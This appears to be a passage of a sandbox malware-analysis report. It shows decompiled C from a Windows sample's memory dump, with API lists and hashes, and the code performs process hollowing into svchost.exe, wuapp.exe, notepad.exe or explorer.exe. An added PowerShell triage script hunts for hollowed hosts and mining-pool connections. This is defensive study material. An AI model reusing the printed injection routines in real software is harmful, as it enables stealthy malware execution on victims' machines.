                                                                                                        				signed int _t175;
                                                                                                        				signed int _t176;
                                                                                                        				intOrPtr* _t181;
                                                                                                        				signed int _t182;
                                                                                                        				intOrPtr* _t185;
                                                                                                        				signed int _t188;
                                                                                                        				intOrPtr* _t192;
                                                                                                        				void* _t199;
                                                                                                        				void* _t204;
                                                                                                        				void* _t205;
                                                                                                        				void* _t208;
                                                                                                        				void* _t209;
                                                                                                        				void* _t210;
                                                                                                        				void* _t223;
                                                                                                        				signed int _t225;
                                                                                                        
                                                                                                        				_t175 = __edx;
                                                                                                        				_t154 = __ecx;
                                                                                                        				_t153 = _t199;
                                                                                                        				_v8 =  *((intOrPtr*)(_t153 + 4));
                                                                                                        				E01461BB0( &_v1372, 0, 0x4d0);
                                                                                                        				_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                        				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
                                                                                                        				_v1324 = 0x100002;
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movlpd [ebp-0x30], xmm0");
                                                                                                        				_t215 =  *_t185 - 0x5a4d;
                                                                                                        				if( *_t185 != 0x5a4d) {
                                                                                                        					E01461CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
                                                                                                        					_t204 = _t204 + 0x10;
                                                                                                        				}
                                                                                                        				_t99 = E01461E50(_t154, _t175, _t215, "ntdll.dll");
                                                                                                        				_v20 = _t99;
                                                                                                        				_t205 = _t204 + 4;
                                                                                                        				_v16 = _t175;
                                                                                                        				_t156 = _t99 | _t175;
                                                                                                        				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
                                                                                                        					L34:
                                                                                                        					__eflags = 0;
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
                                                                                                        					if( *_t181 != 0x4550) {
                                                                                                        						goto L34;
                                                                                                        					} else {
                                                                                                        						E01461670( &_v132, 0, 0x44);
                                                                                                        						E01461670( &_v40, 0, 0x10);
                                                                                                        						_t208 = _t205 + 0x18;
                                                                                                        						_v132 = 0x44;
                                                                                                        						_push( &_v40);
                                                                                                        						_push( &_v132);
                                                                                                        						_push(0);
                                                                                                        						_push(0);
                                                                                                        						if( *0x1631bb8 == 0) {
                                                                                                        							_push(4);
                                                                                                        						} else {
                                                                                                        							_push(0x800000c);
                                                                                                        						}
                                                                                                        						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??);
                                                                                                        						_t220 = _t107;
                                                                                                        						if(_t107 == 0) {
                                                                                                        							goto L34;
                                                                                                        						} else {
                                                                                                        							_t109 = E014661F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372);
                                                                                                        							_t209 = _t208 + 0x10;
                                                                                                        							_t221 = _t109;
                                                                                                        							if(_t109 == 0) {
                                                                                                        								L33:
                                                                                                        								TerminateProcess(_v40, 0);
                                                                                                        								CloseHandle(_v36);
                                                                                                        								CloseHandle(_v40);
                                                                                                        								goto L34;
                                                                                                        							} else {
                                                                                                        								asm("adc eax, 0x0");
                                                                                                        								_t116 = E01466250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24);
                                                                                                        								_t210 = _t209 + 0x20;
                                                                                                        								if(_t116 == 0) {
                                                                                                        									goto L33;
                                                                                                        								} else {
                                                                                                        									_t159 =  *((intOrPtr*)(_t181 + 0x34));
                                                                                                        									_t176 = _v56;
                                                                                                        									_t117 =  *((intOrPtr*)(_t181 + 0x30));
                                                                                                        									_v20 = _t159;
                                                                                                        									_t223 = _t176 - _t159;
                                                                                                        									if(_t223 < 0) {
                                                                                                        										L18:
                                                                                                        										_t118 = E014672C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
                                                                                                        										_v20 = _t118;
                                                                                                        										_v16 = _t176;
                                                                                                        										if((_t118 | _t176) == 0 || E014674D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
                                                                                                        											goto L33;
                                                                                                        										} else {
                                                                                                        											_t188 = _v20;
                                                                                                        											if(E014673C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
                                                                                                        												goto L33;
                                                                                                        											} else {
                                                                                                        												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
                                                                                                        												_v24 = 0;
                                                                                                        												if(0 >=  *(_t181 + 6)) {
                                                                                                        													L27:
                                                                                                        													asm("adc eax, 0x0");
                                                                                                        													if(E014674D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
                                                                                                        														goto L33;
                                                                                                        													} else {
                                                                                                        														_t182 = _v16;
                                                                                                        														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
                                                                                                        														asm("adc ecx, edi");
                                                                                                        														_v1240 = 0;
                                                                                                        														if(E01467230(0, _t176, _v36,  &_v1372) == 0 || E014671A0(0, _t176, _v36) == 0) {
                                                                                                        															goto L33;
                                                                                                        														} else {
                                                                                                        															Sleep(0x1388);
                                                                                                        															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                        															_v24 = _t132;
                                                                                                        															if(_t132 != 0) {
                                                                                                        																E01461BB0(_t132, 0, 0x138);
                                                                                                        																E014674D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
                                                                                                        																VirtualFree(_v24, 0, 0x8000);
                                                                                                        															}
                                                                                                        															CloseHandle(_v36);
                                                                                                        															CloseHandle(_v40);
                                                                                                        															return _v32;
                                                                                                        														}
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t192 = _t181 + 0x2c + _t122;
                                                                                                        													while(1) {
                                                                                                        														asm("adc eax, [ebp-0x4]");
                                                                                                        														if(E014674D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
                                                                                                        															goto L33;
                                                                                                        														}
                                                                                                        														_t145 = E01466300( *((intOrPtr*)(_t192 + 0x10)));
                                                                                                        														_t210 = _t210 + 4;
                                                                                                        														asm("adc eax, [ebp-0x4]");
                                                                                                        														if(E014673C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
                                                                                                        															goto L33;
                                                                                                        														} else {
                                                                                                        															_t192 = _t192 + 0x28;
                                                                                                        															_t173 = _v24 + 1;
                                                                                                        															_v24 = _t173;
                                                                                                        															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
                                                                                                        																continue;
                                                                                                        															} else {
                                                                                                        																_t188 = _v20;
                                                                                                        																goto L27;
                                                                                                        															}
                                                                                                        														}
                                                                                                        														goto L35;
                                                                                                        													}
                                                                                                        													goto L33;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										_t174 = _v60;
                                                                                                        										if(_t223 > 0 || _t174 >= _t117) {
                                                                                                        											_v16 =  *((intOrPtr*)(_t181 + 0x50));
                                                                                                        											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
                                                                                                        											_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                        											asm("adc eax, [ebp-0x8]");
                                                                                                        											_t225 = _t176;
                                                                                                        											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
                                                                                                        												goto L18;
                                                                                                        											} else {
                                                                                                        												_t151 = E01467120(_t176, _v40, _t174, _t176);
                                                                                                        												_t227 = _t151;
                                                                                                        												if(_t151 != 0) {
                                                                                                        													goto L33;
                                                                                                        												} else {
                                                                                                        													goto L18;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										} else {
                                                                                                        											goto L18;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L35:
			}

APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 01465F4A
• Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 01466150
• VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 01466164
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 014661A1
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 014661B0
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 014661B5
  • Part of subcall function 014674D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 014674FF
  • Part of subcall function 014673C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 01467429
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,014649E6,?), ref: 014661C8
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,014649E6,?), ref: 014661D7
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,014649E6,?), ref: 014661DC
Strings
Memory Dump Source
• Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
Yara matches
Similarity
• API ID: CloseHandleProcess$CurrentVirtual$AllocCreateFreeSleepTerminate
• String ID: 0125789244697858$ntdll.dll
• API String ID: 1806556286-2057982665
• Opcode ID: 16f3ce30a227ddef1283f3bdfd302ce016c7c6a03096d7c9a796b8e8a31f9c3e
• Instruction ID: dc83f1455f4bc23eade9d934770dfca9749fc1aa5d68ec150ee0513036f37eff
• Opcode Fuzzy Hash: 16f3ce30a227ddef1283f3bdfd302ce016c7c6a03096d7c9a796b8e8a31f9c3e
• Instruction Fuzzy Hash: 8CB185B1D00209FBEF14DB95DD41FEEBBB9FF14708F14405AEA04A62A1E771A950CB92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%
E01465A50(void* __ecx, void* _a4, void* _a8, long* _a12, long* _a16) {
	void* _v8;
	void* _t31;
	int _t32;
	int _t36;
	void* _t44;
	long _t46;
	void* _t56;
	void* _t60;

	 *_a12 = 0;
	 *_a16 = 0;
	_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
	if(_t56 == 0) {
		L3:
		return 0;
	} else {
		if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
			if( *_t56 != 0x5a4d) {
				goto L2;
			} else {
				_v8 =  *((intOrPtr*)(_t56 + 0x3c));
				VirtualFree(_t56, 0, 0x8000);
				_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
				if(_t44 == 0) {
					L11:
					return 0;
				} else {
					_t31 = _a8 + _v8;
					_v8 = _t31;
					_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
					_push(0x8000);
					_push(0);
					_push(_t44);
					if(_t32 == 0 ||  *_t44 != 0x4550) {
						L10:
						VirtualFree();
						goto L11;
					} else {
						VirtualFree();
						_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
						_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
						if(_t60 == 0) {
							goto L11;
						} else {
							_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
							_push(0x8000);
							_push(0);
							_push(_t60);
							if(_t36 != 0) {
								if( *_t60 != 0x4550) {
									goto L10;
								} else {
									 *_a12 =  *(_t60 + 0x50);
									 *_a16 =  *(_t60 + 0x28);
									VirtualFree(??, ??, ??);
									return 1;
								}
							} else {
								goto L10;
							}
						}
					}
				}
			}
		} else {
			L2:
			VirtualFree(_t56, 0, 0x8000);
			goto L3;
		}
	}
}

APIs
• VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,75145B60,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465A79
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465A8C
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465A9E
• VirtualFree.KERNEL32(00000000,00000000,00008000,014649E6,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465ACB
• VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465AD8
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465AF2
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465B10
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465B1F
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0146563B,?,00000000,00000000,00000000), ref: 01465B35
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465B47
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0146563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 01465B6A
Memory Dump Source
• Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
Yara matches
Similarity
• API ID: Virtual$Free$AllocMemoryProcessRead
• String ID:
• API String ID: 1260273505-0
• Opcode ID: 729f5a53a3871015c3383a575776d4ea2f79195505641e6089ba2537cfe2e28f
• Instruction ID: 75850b68579b6554f3f4db7a2cc445b277a689cdc1b1e0bf94284e81a4b4515b
• Opcode Fuzzy Hash: 729f5a53a3871015c3383a575776d4ea2f79195505641e6089ba2537cfe2e28f
• Instruction Fuzzy Hash: CE316071741714BBEB319F99DC41F9A7BA8AF05B59F100055FB04AF2E1D6B1A8008BA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 22%
E01467FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
	char _v8;
	_Unknown_base(*)()* _t11;
	_Unknown_base(*)()* _t12;
	struct HINSTANCE__* _t22;

	_t22 = LoadLibraryA("Shell32.dll");
	if(_t22 == 0) {
		L8:
		return 0;
	} else {
		_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
		if(_t11 == 0) {
			_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
			if(_t12 == 0) {
				goto L7;
			} else {
				_push(_a4);
				_push(0);
				_push(0);
				_push(_a12);
				_push(0);
				if( *_t12() == 0) {
					goto L4;
				} else {
					goto L7;
				}
			}
		} else {
			_v8 = 0;
			_push( &_v8);
			_push(0);
			_push(0);
			_push(_a8);
			if( *_t11() != 0) {
				L7:
				FreeLibrary(_t22);
				goto L8;
			} else {
				E01461A00(_a4, _v8);
				__imp__CoTaskMemFree(_v8);
				L4:
				FreeLibrary(_t22);
				return 1;
			}
		}
	}
}

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FAA
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FBC
                                                                                                        • CoTaskMemFree.OLE32(00000000,0146AAE0), ref: 01467FEF
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FF6
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 0146800C
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01468029
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                        • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                        • API String ID: 2437428030-337183102
                                                                                                        • Opcode ID: ef5a7084ce8986e418b8a011375e90a43c32ac7a44b0f242faac332fbc5292ee
                                                                                                        • Instruction ID: d4a1681bb3c435a58ce5b6e251f13a7bf965bc1c80f8b538be91b43cd4db5ea6
                                                                                                        • Opcode Fuzzy Hash: ef5a7084ce8986e418b8a011375e90a43c32ac7a44b0f242faac332fbc5292ee
                                                                                                        • Instruction Fuzzy Hash: 7D018471680716BBEB315F55DC09B9E3BACEF08A4EF100055F904A51B0DBB596109797
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 014663BC
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0146644C
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?), ref: 01466472
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 014664C0
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 014664F5
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01466591
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 014665BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$Free$File$AllocModuleNameSize
                                                                                                        • String ID: @
                                                                                                        • API String ID: 994213472-2766056989
                                                                                                        • Opcode ID: 19a38e2d253fba3960937bca2171791d9f313e262d37bd7ed5b8b31fbefbb15d
                                                                                                        • Instruction ID: 7c061aaa882431e2f244e42c127a9792d74d08c96cb4b32be6d65399450f16a3
                                                                                                        • Opcode Fuzzy Hash: 19a38e2d253fba3960937bca2171791d9f313e262d37bd7ed5b8b31fbefbb15d
                                                                                                        • Instruction Fuzzy Hash: 05714971A4021CABEF208F94DC49BEEBBB9FB09708F104116F604F6290DBB55A58CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 78%
			// Fetches the SID of the account that owns the current process token and hands it,
			// together with _a4, to E01467AA0 (body not in this excerpt). Returns 1 when E01467AA0
			// returns nonzero, 0 on any failure. Information class 1 is TokenUser, so _t34 points
			// at a TOKEN_USER whose first field is the user SID (TokenIntegrityLevel would be 25).
			E014682B0(intOrPtr _a4) {
				void* _v8;    // process token handle
				long _v12;    // size of the TOKEN_USER buffer
				void* _t20;
				void* _t27;
				void* _t34;   // TOKEN_USER buffer
				void* _t37;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8 /* TOKEN_QUERY */,  &_v8) == 0) {
					L4:
					return 0;
				} else {
					// Size query: with a NULL buffer the call fails with 0x7a (ERROR_INSUFFICIENT_BUFFER)
					// and _v12 receives the required length.
					if(GetTokenInformation(_v8, 1 /* TokenUser */, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
						_t20 = E014615E0(_v12);       // apparently the sample's allocator: _v12 bytes, released by E01461510 below
						_t38 = _t37 + 4;
						_t34 = _t20;
						if(GetTokenInformation(_v8, 1 /* TokenUser */, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
							_push(_t34);
							goto L8;
						} else {
							_t27 = E01467AA0( *_t34, _a4);   // *_t34 == TOKEN_USER.User.Sid
							_t38 = _t38 + 8;
							_push(_t34);
							if(_t27 == 0) {
								L8:
								E01461510();                // release _t34 (argument pushed above)
								CloseHandle(_v8);
								return 0;
							} else {
								E01461510();                // release _t34
								CloseHandle(_v8);
								return 1;
							}
						}
					} else {
						CloseHandle(_v8);
						goto L4;
					}
				}
			}

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 014682CA
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 014682D1
• GetTokenInformation.ADVAPI32(00000000,00000001(TokenUser),00000000,00000000,00000000), ref: 014682E8
                                                                                                        • GetLastError.KERNEL32 ref: 014682F2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468300
• GetTokenInformation.ADVAPI32(00000000,00000001(TokenUser),00000000,00000000,00000000,00000000), ref: 01468327
                                                                                                        • IsValidSid.ADVAPI32(00000000), ref: 01468333
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468349
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468373
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                        • String ID:
                                                                                                        • API String ID: 2832165296-0
                                                                                                        • Opcode ID: 21072ad47593f493a1f7e7908610cdcdf3792f27a46439024d228e7a929b60e5
                                                                                                        • Instruction ID: 5b70a801a6609fe0088e9bf46ea261a0b618b63305ae77ed58505700ba2a257a
                                                                                                        • Opcode Fuzzy Hash: 21072ad47593f493a1f7e7908610cdcdf3792f27a46439024d228e7a929b60e5
                                                                                                        • Instruction Fuzzy Hash: 8F214C71900209FBEF215FA4ED09BDE7FADEF1464DF1000A6F905E1174EB728A609B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Chooses the image that will host the injected payload and writes its full path into
			// the string object at _a4. Two globals select the directory: both clear -> System32;
			// 0x1631318 set (whatever 0x1631314 holds) -> SysWOW64; only 0x1631314 set -> the
			// Windows directory itself (notepad.exe / explorer.exe). The primary candidate (_t17)
			// is tried first, then the fallback (_t18). E01467ED0 apparently tests whether the
			// built path exists; its body is not in this excerpt.
			E01463150(intOrPtr _a4) {
				short _v524;          // wide-char buffer for GetWindowsDirectoryW (MAX_PATH characters)
				int _t6;
				void* _t16;
				char* _t17;           // primary host image
				char* _t18;           // fallback host image
				intOrPtr _t20;        // missing from the decompiler output; alias of _a4

				if( *0x1631314 == 0) {
					if( *0x1631318 == 0) {
						_t17 = L"\\System32\\wuapp.exe";
						_t18 = L"\\System32\\svchost.exe";
					} else {
						goto L4;
					}
				} else {
					if( *0x1631318 != 0) {
						L4:
						_t17 = L"\\SysWOW64\\wuapp.exe";
						_t18 = L"\\SysWOW64\\svchost.exe";
					} else {
						_t17 = L"\\notepad.exe";
						_t18 = L"\\explorer.exe";
					}
				}
				_t6 = GetWindowsDirectoryW( &_v524, 0x104 /* MAX_PATH */);
				if(_t6 == 0 || _t6 > 0x104) {
					return 0;
				} else {
					_t20 = _a4;
					E01461A00(_a4,  &_v524);     // apparently: assign the Windows directory to the string at _a4
					E01461970(_a4, _t17);        // apparently: append the primary image suffix
					if(E01467ED0(_t20) != 0) {
						L11:
						return 1;
					} else {
						E01461A00(_t20,  &_v524);    // rebuild with the fallback image
						E01461970(_t20, _t18);
						_t16 = E01467ED0(_t20);
						if(_t16 != 0) {
							goto L11;
						} else {
							return _t16;
						}
					}
				}
			}
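
The drop directory named in the SHGetKnownFolderPath routine above (C:\ProgramData\LKBNMTFJgl) and the host images E01463150 chooses give a responder two concrete things to look for on a live host. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It assumes, and the report does not state any of this, that the chosen host image is the process that later speaks Stratum, that the parent/child pairs listed are those of a default Windows install, and that the pool ports are typical public-pool defaults rather than ports observed in this analysis.

```powershell
# Added triage script; not part of the Joe Sandbox report or of the sample.
# Assumptions (not taken from the report): the hollowed host is what later
# speaks Stratum; $ExpectedParent reflects a default Windows install; $PoolPorts
# are common public-pool defaults, not ports seen in this analysis.
# Run from an elevated session so every process and socket is visible.

$DropDir = 'C:\ProgramData\LKBNMTFJgl'   # argument seen in the SHGetKnownFolderPath routine

# Host candidates from E01463150, with the parent image a legitimate instance
# normally has. An empty list means "flag any established TCP connection":
# notepad.exe and wuapp.exe have no reason to hold a socket at all.
$ExpectedParent = @{
    'svchost.exe'  = @('services.exe')
    'explorer.exe' = @('userinit.exe', 'winlogon.exe', 'explorer.exe')
    'wuapp.exe'    = @()
    'notepad.exe'  = @()
}
$PoolPorts = @(3333, 4444, 5555, 7777, 14433, 14444)   # assumption: common stratum ports

function Get-MinerHostFindings {
    $findings = New-Object System.Collections.Generic.List[object]

    if (Test-Path -LiteralPath $DropDir) {
        $findings.Add([pscustomobject]@{ Indicator = 'DropDirPresent'; Detail = $DropDir })
    }

    # One process snapshot; the parent lookup needs the whole table.
    $all   = Get-CimInstance -ClassName Win32_Process
    $byPid = @{}
    foreach ($p in $all) { $byPid[[int]$p.ProcessId] = $p }

    # Established sockets grouped by owning PID.
    $connsByPid = @{}
    foreach ($c in (Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue)) {
        $owner = [int]$c.OwningProcess
        if (-not $connsByPid.ContainsKey($owner)) {
            $connsByPid[$owner] = New-Object System.Collections.Generic.List[object]
        }
        $connsByPid[$owner].Add($c)
    }

    foreach ($p in $all) {
        $name = $p.Name.ToLower()
        if (-not $ExpectedParent.ContainsKey($name)) { continue }

        $parent     = $byPid[[int]$p.ParentProcessId]
        $parentName = if ($parent) { $parent.Name.ToLower() } else { '<exited>' }
        $allowed    = $ExpectedParent[$name]

        # 1. A host with a fixed legitimate parent that was started by something else,
        #    e.g. a hollowed svchost.exe spawned by the dropper instead of services.exe.
        if ($allowed.Count -gt 0 -and $parentName -notin $allowed) {
            $findings.Add([pscustomobject]@{
                Indicator = 'UnexpectedParent'
                Detail    = "$name PID $($p.ProcessId) parent=$parentName ($($p.ParentProcessId)) cmd=$($p.CommandLine)"
            })
        }

        # 2. Network activity that does not fit the host image: any socket for
        #    notepad/wuapp, a known pool port for svchost/explorer.
        if ($connsByPid.ContainsKey([int]$p.ProcessId)) {
            foreach ($c in $connsByPid[[int]$p.ProcessId]) {
                if (($allowed.Count -eq 0) -or ($PoolPorts -contains [int]$c.RemotePort)) {
                    $findings.Add([pscustomobject]@{
                        Indicator = 'UnexpectedNetwork'
                        Detail    = "$name PID $($p.ProcessId) -> $($c.RemoteAddress):$($c.RemotePort)"
                    })
                }
            }
        }
    }
    return $findings
}

Get-MinerHostFindings | Format-Table -AutoSize
```

The parent check is a point-in-time view: a parent that has exited shows as `<exited>`, and a reused PID can point at an unrelated process, so treat an UnexpectedParent hit as a lead to confirm with the process creation log (Sysmon event 1 or 4688) rather than a verdict. The network check is deliberately asymmetric: for notepad.exe and wuapp.exe any established socket is enough, while svchost.exe and explorer.exe are only flagged on the assumed pool ports because both legitimately talk to the network.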

APIs
• GetWindowsDirectoryW.KERNEL32(?,00000104,75144D40,00000000), ref: 014631A4
Strings
Memory Dump Source
• Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
Yara matches
Similarity
• API ID: DirectoryWindows
• String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
• API String ID: 3619848164-3654143111
• Opcode ID: dfbe7f1d752ff756bf023de64593195413a5d0a83ca3e00a9600bc4089f96190
• Instruction ID: 0ba5d5e4795b6f5da91d4c8519fef068f2d2eed4542dc0bbf6e3ca9ca1fbf840
• Opcode Fuzzy Hash: dfbe7f1d752ff756bf023de64593195413a5d0a83ca3e00a9600bc4089f96190
• Instruction Fuzzy Hash: CB113A726013456BEB306A19EC44BEB736CEB5256DF04016BED0CC2231D7758E85C2E7
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 17%
E014629E0(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16, DWORD* _a20, intOrPtr _a24) {
	CHAR* _v8;
	CHAR* _v12;
	void* _v16;
	long _v20;
	CHAR* _v24;
	long _v28;
	CHAR* _v32;
	struct HINSTANCE__* _v36;
	intOrPtr* _v40;
	long _v44;
	long _v48;
	long _v52;
	char _v56;
	long _v60;
	long _v64;
	long _v68;
	long _v72;
	long _v76;
	char _v80;
	void* _t112;
	void* _t115;
	CHAR* _t118;
	CHAR* _t119;
	CHAR* _t129;
	signed short _t132;
	CHAR* _t134;
	_Unknown_base(*)()* _t135;
	intOrPtr _t136;
	intOrPtr _t137;
	CHAR* _t138;
	CHAR* _t141;
	CHAR* _t142;
	CHAR* _t147;
	void* _t149;
	CHAR* _t150;
	void* _t164;
	CHAR** _t165;
	void* _t168;
	void* _t170;
	struct HINSTANCE__* _t176;
	CHAR* _t177;
	signed int _t178;
	CHAR* _t180;
	signed int _t185;
	CHAR* _t188;
	_Unknown_base(*)()** _t190;
	intOrPtr _t192;
	CHAR* _t193;
	CHAR* _t195;
	intOrPtr* _t196;
	void* _t198;
	signed short* _t199;
	CHAR** _t201;
	char _t202;
	void* _t204;
	void* _t205;
	void* _t208;
